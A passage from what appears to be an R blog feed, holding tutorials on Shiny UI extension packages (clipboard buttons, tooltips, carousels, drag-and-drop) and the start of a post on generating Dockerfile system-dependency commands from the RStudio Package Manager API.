&lt;h2 id="rclipboard--tippy"&gt;&lt;a href="https://github.com/sbihorel/rclipboard" rel="external"&gt;{rclipboard}&lt;/a&gt; &amp;amp; &lt;a href="https://github.com/JohnCoene/tippy" rel="external"&gt;{tippy}&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;If your app needs to generate any kind of text that would then need to
be used elsewhere, e.g. a URL or a uniquely identifying string, then a
“Copy to clipboard” button can easily be added with the {rclipboard}
package. The main function from {rclipboard} is &lt;code&gt;rclipButton()&lt;/code&gt; which
creates a clickable button that lets you copy whatever is passed to the
&lt;code&gt;clipText&lt;/code&gt; argument. There are no associated &lt;code&gt;render*()&lt;/code&gt; or &lt;code&gt;*Output()&lt;/code&gt;
functions, so you can create your clipboard button and then render it
with &lt;code&gt;renderUI()&lt;/code&gt; and display it with &lt;code&gt;uiOutput()&lt;/code&gt;. You will also need
to activate the copy to clipboard functionality by including the
&lt;code&gt;rclipboardSetup()&lt;/code&gt; command in your UI.&lt;/p&gt;
&lt;p&gt;A basic button could be created like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rclipboardSetup&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;uiOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;clip&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the server&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;clip &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderUI&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rclipButton&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;clip_button&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Copy to clipboard&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clipText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Text to be copied&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; icon &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;icon&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;clipboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;However, when you press this button there is no feedback to the user
that anything has actually been copied. This is where the {tippy}
package comes in. {tippy} allows you to add tooltips to UI elements in
your app that appear at a certain trigger such as hover or click.
Tooltips are an effective way to provide help or feedback to the user
and improve their experience using the app.&lt;/p&gt;
&lt;p&gt;All you need to do is call the &lt;code&gt;tippy_this()&lt;/code&gt; function on the input ID
of your UI component. If we have a clipboard button with ID
&lt;code&gt;clip_button&lt;/code&gt; as above, we could add a tooltip that says “String
copied!” whenever the button is clicked.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tippy_this&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;clip_button&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tooltip &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;String copied!&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; trigger &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;click&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In my example app:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of a random string being copied to clipboard with tooltip pop-up and then being pasted." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/gifs/rclipboard_tippy.gif" width="882"&gt;&lt;/p&gt;
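&lt;p&gt;The reason for building the button inside &lt;code&gt;renderUI()&lt;/code&gt; becomes clearer when the text to copy depends on an input. Below is a minimal sketch of the {rclipboard} part on its own, without the tooltip; the IDs &lt;code&gt;copy_text&lt;/code&gt;, &lt;code&gt;clip&lt;/code&gt; and &lt;code&gt;clip_button&lt;/code&gt; are placeholders chosen for this example.&lt;/p&gt;

```r
library("shiny")
library("rclipboard")

ui = fluidPage(
  rclipboardSetup(), # load the clipboard JavaScript
  textInput("copy_text", "Text to copy", value = "Hello!"),
  uiOutput("clip")   # placeholder that the button is rendered into
)

server = function(input, output, session) {
  output$clip = renderUI({
    # re-created whenever input$copy_text changes,
    # so the button always copies the current value
    rclipButton(
      inputId = "clip_button",
      label = "Copy to clipboard",
      clipText = input$copy_text,
      icon = icon("clipboard")
    )
  })
}

shinyApp(ui, server)
```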
&lt;h2 id="shinyglide"&gt;&lt;a href="https://github.com/juba/shinyglide" rel="external"&gt;{shinyglide}&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;{shinyglide} lets you create a carousel-like window that allows the user
to step through a fixed sequence of screens using “Next”
and “Back” buttons. It’s a nice way to add a pop-up that guides your user
through some action, whether that is collecting inputs for your app,
demoing how to use the app, or just showing an embedded presentation.&lt;/p&gt;
&lt;p&gt;There is a lot of flexibility when using {shinyglide}, but a basic
series of screens could be constructed like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glide&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;screen&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# content on the first screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;screen&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# content on second screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A nice feature is that you can easily add a condition that needs to be
met before the user can move on to the next screen, e.g., the user needs to
provide some input. This is done with the &lt;code&gt;next_condition&lt;/code&gt; argument in
the &lt;code&gt;screen()&lt;/code&gt; function.&lt;/p&gt;
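&lt;p&gt;As a hedged sketch of how this might look: the condition is written as a JavaScript expression in a string, in the same style as the conditions used by Shiny’s &lt;code&gt;conditionalPanel()&lt;/code&gt;. Here the “Next” button on the first screen should stay disabled until something is typed in; the input ID &lt;code&gt;name&lt;/code&gt; and the greeting are placeholders.&lt;/p&gt;

```r
library("shiny")
library("shinyglide")

ui = fluidPage(
  glide(
    screen(
      textInput("name", "What is your name?"),
      # JavaScript expression: Next is only enabled once a name is entered
      next_condition = "input.name !== ''"
    ),
    screen(
      textOutput("greeting")
    )
  )
)

server = function(input, output, session) {
  output$greeting = renderText(paste0("Hello, ", input$name, "!"))
}

shinyApp(ui, server)
```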
&lt;p&gt;In my example app:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of three shinyglide screens being moved between using Next and Back buttons." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/gifs/shinyglide.gif" width="1116"&gt;&lt;/p&gt;
&lt;h2 id="sortable"&gt;&lt;a href="https://github.com/rstudio/sortable" rel="external"&gt;{sortable}&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Last but not least is {sortable}, a package that enables
drag-and-drop behaviour in your Shiny apps. This means that the user can
perform actions such as rearranging plots in a grid, or including and excluding
elements by dragging them in and out of a specific panel.&lt;/p&gt;
&lt;p&gt;The basic syntax of {sortable} is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sortable_js&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;element_id&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;where &lt;code&gt;&amp;quot;element_id&amp;quot;&lt;/code&gt; is the ID of the div containing the elements you
wish to be drag-and-drop-able.&lt;/p&gt;
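&lt;p&gt;A minimal sketch of how that fits into a UI definition, assuming a plain div with three
child elements (the item labels are hypothetical placeholders; only the ID has to match
the one passed to &lt;code&gt;sortable_js()&lt;/code&gt;):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(shiny)
library(sortable)

ui = fluidPage(
  # The container whose direct children should become draggable
  tags$div(
    id = &amp;#34;element_id&amp;#34;,
    tags$div(&amp;#34;First item&amp;#34;),
    tags$div(&amp;#34;Second item&amp;#34;),
    tags$div(&amp;#34;Third item&amp;#34;)
  ),
  # Attach drag-and-drop behaviour to the children of that container
  sortable_js(&amp;#34;element_id&amp;#34;)
)

# No server logic is needed just to reorder elements in the browser
server = function(input, output, session) {}

# shinyApp(ui, server)  # uncomment to launch the app interactively
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;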
&lt;p&gt;In my example app:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of four plots in a grid where two are swapped by using drag and\ndrop with the cursor." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/gifs/sortable.gif" width="878"&gt;&lt;/p&gt;
&lt;h2 id="further-resources"&gt;Further resources&lt;/h2&gt;
&lt;p&gt;If you want to explore even more packages that extend the Shiny
framework, I would highly recommend checking out this curated list of
Shiny extension packages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/nanxstats/awesome-shiny-extensions" rel="external"&gt;Awesome Shiny
Extensions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Automating Dockerfile creation for Shiny apps</title><link>https://www.jumpingrivers.com/blog/shiny-auto-docker/</link><pubDate>Thu, 20 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-auto-docker/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-auto-docker/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-auto-docker/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;For creating a production deployment of a {shiny} application it is
often useful to be able to provide a Docker image that contains all the
dependencies for that application. Here we explore how one might go
about automating the creation of a Dockerfile that will allow us to
build such an image for a {shiny} application.&lt;/p&gt;
&lt;h2 id="what-is-docker"&gt;What is Docker?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.docker.com/" rel="external"&gt;Docker&lt;/a&gt; is an open source platform that
enables developers to build, deploy and run containers: standardised
executable components that combine application source code with the
operating system libraries and dependencies required to run that code.&lt;/p&gt;
&lt;p&gt;A general introduction to Docker for R users can be found in
&lt;a href="https://colinfay.me/docker-r-reproducibility/" rel="external"&gt;this&lt;/a&gt; blog post by Colin
Fay, and the Docker &lt;a href="https://www.docker.com/" rel="external"&gt;website&lt;/a&gt; also has some
excellent documentation.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-auto-docker"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="obtaining-system-dependencies"&gt;Obtaining system dependencies&lt;/h2&gt;
&lt;p&gt;When installing R packages, occasionally you will need additional system
dependencies. When building a Docker image we will want to include the
installation of those system dependencies in the Dockerfile. If we are
to automate the process of writing a Dockerfile for building an image to
run a {shiny} application, then we need a programmatic
way to determine the required system dependencies.&lt;/p&gt;
&lt;p&gt;It turns out that the RStudio Package Manager (RSPM) product has an API
that can be queried to obtain the system requirements of a collection of
R packages. The lovely folk at Posit also provide a public instance of RSPM
that anyone can use, so it is easy to obtain this information
even if you do not run RSPM yourself. For example, if we wanted to
inspect the system dependencies of a package like {shiny} on Ubuntu
22.04, then a
&lt;a href="https://packagemanager.rstudio.com/__api__/repos/1/sysreqs?all=false&amp;amp;pkgname=shiny&amp;amp;distribution=ubuntu&amp;amp;release=22.04" rel="external"&gt;request&lt;/a&gt;
to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;https://packagemanager.rstudio.com/__api__/repos/1/sysreqs?all&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;false&amp;amp;&lt;span style="color:#79c0ff"&gt;pkgname&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;shiny&amp;amp;&lt;span style="color:#79c0ff"&gt;distribution&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ubuntu&amp;amp;&lt;span style="color:#79c0ff"&gt;release&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;22.04
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;would do the trick.&lt;/p&gt;
&lt;p&gt;In fact, the {vetiver} package has a non-exported function,
&lt;code&gt;glue_sys_reqs()&lt;/code&gt;, that builds the Dockerfile command to install
these system requirements.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;glue_sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(pkgs) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rlang&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;check_installed&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;curl&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.getenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;RSPM_ROOT&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://packagemanager.rstudio.com&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm_repo_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.getenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;RSPM_REPO_ID&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm_repo_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;{rspm}/__api__/repos/{rspm_repo_id}&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pkgnames &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue_collapse&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(pkgs), sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;amp;pkgname=&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;{rspm_repo_url}/sysreqs?all=false&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;amp;pkgname={pkgnames}&amp;amp;distribution=ubuntu&amp;amp;release=22.04&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; curl&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;curl_fetch_memory&lt;/span&gt;(req_url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rawToChar&lt;/span&gt;(res&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;content), simplifyVector &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(sys_reqs&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;error)) rlang&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;abort&lt;/span&gt;(sys_reqs&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;error)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(sys_reqs&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;requirements, purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;pluck, &lt;span style="color:#a5d6ff"&gt;&amp;#34;requirements&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;packages&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sort&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;(sys_reqs)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue_collapse&lt;/span&gt;(sys_reqs, sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; \\\n &amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;RUN apt-get update -qq &amp;amp;&amp;amp; \\ \n&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; apt-get install -y --no-install-recommends \\\n &amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; &amp;amp;&amp;amp; \\\n&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; apt-get clean &amp;amp;&amp;amp; \\ \n&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; rm -rf /var/lib/apt/lists/*&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .trim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Trying that out on a vector of packages we get something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue_sys_reqs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; RUN apt-get update -qq &amp;amp;&amp;amp; \ &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; apt-get install -y --no-install-recommends \&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; make \&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; zlib1g-dev &amp;amp;&amp;amp; \&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; apt-get clean &amp;amp;&amp;amp; \ &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; rm -rf /var/lib/apt/lists/*&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To grab the system requirements for all packages that are used by a
{shiny} app, we could use &lt;code&gt;renv::dependencies()&lt;/code&gt; to scan our code
and list the packages it uses, then feed them to this function.&lt;/p&gt;
